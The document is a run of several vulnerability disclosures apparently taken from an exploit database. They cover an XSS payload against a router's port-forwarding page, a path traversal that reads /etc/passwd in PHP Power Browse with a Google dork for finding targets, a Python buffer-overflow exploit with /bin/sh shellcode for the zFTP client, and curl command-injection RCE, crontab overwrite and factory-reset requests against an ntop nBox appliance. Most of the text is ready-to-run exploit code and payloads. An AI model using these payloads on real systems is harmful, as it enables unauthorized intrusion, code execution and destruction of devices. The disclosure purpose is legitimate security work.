192.168.1.1/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%20onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,
[-] Disclosure Timeline:
[04 06 2016]: Vendor notification
[07 06 2016]: Vulnerability confirmed. No fix will be released.
[16 07 2016]: Public Disclosure
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork:
intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail
(dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High
### Description ###
This file browser is vulnerable to path traversal and allow to an
attacker to access to files and directories that are stored outside the
web root folder.
### Exploit ###
http://site/browse.php?p=source&file=/etc/passwd
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: zFTP Client
# Affected value: NAME under FTP connection
# Where in the code: Line 30 in strcpy_chk.c
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30
# Version: 20061220+dfsg3-4.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ZFTP is a macro-extensible file transfer program which supports the
# transfer of formatted, unformatted and ZEBRA RZ files
# Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb
# MD5sum: 524217187d28e4444d6c437ddd37e4de
# Website: http://cernlib.web.cern.ch/cernlib/
#
# gdb$ run `python -c 'print "A"*30'`
# Starting program: /usr/bin/zftp `python -c 'print "A"*30'`
# *** buffer overflow detected ***: /usr/bin/zftp terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb6fd1773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7061b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb705fc3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb705f127]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup+0x1a4)[0xb7417864]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup_+0x24)[0xb7418604]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(czopen_+0xd4)[0xb73f6d14]
# /usr/bin/zftp[0x804dc9b]
import os, subprocess
def run():
try:
print "# zFTP Client - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 100
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["zftp ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, zFTP client- Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit zFTP Client - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
E-DB Note: Source ~ http://carnal0wnage.attackresearch.com/2016/08/got-any-rces.html
(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)
To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)
https://github.com/javuto/nbox-pwnage
*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:
RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK
curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'
RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;
curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi¶ms=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi¶ms=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'
RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200
curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'
There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:
GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'
The last one is a CSRF that leaves the machine fried, by resetting the machine completely:
GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'
Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...
If you have any questions or feedback, hit me up in twitter (@javutin)!
Have a nice day!